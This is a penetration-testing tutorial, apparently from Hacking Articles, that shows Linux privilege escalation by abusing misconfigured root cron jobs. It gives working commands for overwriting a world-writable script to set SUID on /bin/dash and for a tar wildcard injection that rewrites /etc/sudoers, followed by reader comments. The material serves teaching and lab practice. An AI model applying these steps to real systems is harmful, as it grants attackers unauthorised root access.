Linux Privilege Escalation by Exploiting Cronjobs
After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn “Privilege Escalation by exploiting Cron Jobs” to gain root access of a remote host machine and also examine how a bad implement cron job can lead to Privilege escalation. If you have solved CTF challenges for Post exploit then by reading this article you will realize the several loopholes that lead to privileges escalation.
For details, you can read our previous article where we had applied this trick for privilege escalation. Open the links given below:
Link1: Hack the Box Challenge: Europa Walkthrough
Link2: Hack the Milnet VM (CTF Challenge)
Table of content
- Introduction
- Cron job
- Crontab syntax
- Crontab File overwrite
- Lab Setup (Ubuntu)
- Exploiting cron job (Kali Linux)
- Crontab Tar wildcard Injection
- Lab Setup (Ubuntu)
- Exploiting cron job (Kali Linux)
Let’s Start!!!
What is a cron job?
Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server. They’re most commonly used for sysadmin jobs such as backups or cleaning /tmp/ directories and so on. The word Cron comes from crontab and it is present inside /etc directory.
For example: Inside crontab, we can add the following entry to print apache error logs automatically in every 1 hour.
1 0 * * * printf "" > /var/log/apache/error_log
Crontab File overwrite
Lab Setup for the Poorly configured cron job
Objective: Set a new job with help of crontab to run a python script which will erase all data from in a particular directory.
Let assume “cleanup” is the directory whose data will be cleared automatically every two minutes. Thus we have saved some data inside /home/cleanup.
mkdir cleanup cd cleanup echo "hello friends" > 1.txt echo "ALL files will be deleted in 2 mints" > 2.txt echo > 1.php echo > 2.php ls
As you can observe from the given image some files are stored inside the cleanup directory.
Now write a python program in any other directory to delete data from inside /home/cleanup and give it all permission.
cd /tmp nano cleanup.py
#!/usr/bin/env python import os import sys try: os.system('rm -r /home/cleanup/* ') except: sys.exit()
chmod 777 cleanup.py
At last schedule a task with help of crontab to run cleanup.py for every 2 minutes.
nano /etc/crontab */2 * * * * root /tmp/cleanup.py
Now let’s verify our objectives
chmod 777 cleanup.py cd /home/cleanup ls date ls date
Cool!! It is working, as you can see all file has been deleted after two minutes.
Post Exploitation
Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into the victim’s machine through ssh and access non-root user terminal. Execute the following command as shown below.
cat /etc/crontab ls -al /tmp/cleanup.py cat /tmp/cleanup.py
From the above steps, we notice the crontab is running python script every two minutes now let’s exploit.
There so many methods to gain root access as in this method we enabled SUID bits /bin/dash. It is quite simple, first, open the file through some editor, for example, nanocleanup.py and replace “rm -r /tmp/*” from the following line as given below
os.system('chmod u+s /bin/dash')
After two minutes it will set SUID permission for /bin/dash and when you will run it will give root access.
/bin/dash id whoami
Awesome!! We hit the Goal…………………
Crontab Tar Wildcard Injection
Lab Setup
Objective: schedule a task with help of crontab to take backup with tar archival program of HTML directory.
The directory should have executable permission whose backup you are going to take.
Now schedule a task with help of crontab to run tar archival program for taking backup of /html inside /var/backups in every 1 minute.
nano /etc/crontab */1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*
Let’s verify the schedule is working or not by executing following command.
cd /var/backup ls date
From given below image you can notice the html.tgz file has been generated after 1 minute.
Post Exploitation
Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into the victim’s machine through ssh and access non-root user terminal. Then open crontab to view if any job is scheduled.
cat /etc/crontab
Here we notice the target has scheduled a tar archival program for every 1 minute and we know that cron job runs as root. Let’s try to exploit.
Execute the following command to grant sudo right to logged user and following post exploitation is known as wildcard injection.
echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > test.sh echo "" > "--checkpoint-action=exec=sh test.sh" echo "" > --checkpoint=1 tar cf archive.tar *
Now after 1 minute it will grant sudo right to the user: ignite as you can confirm this with the given below image.
sudo -l sudo bash whoami
YUPPIEEEE!!! We have successfully obtained root access.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
It will be good with the exploitation, if you put the patch or the solution.
Nice article!
I’ve got two doubts:
1. In the very first example, does the Apache logs get generated every minute or every hour?
2. What is the significance of the asterisk and a forward slash before the number of minutes in the crontab file? Why do we have to write “*/2” instead of just “2” for running a task every 2 minutes?
nice [aarti-{cles}]
Hmane paya ki es aarti{cles} me keval user ka cronjon mention kiya gya hai? without user ka add kijiye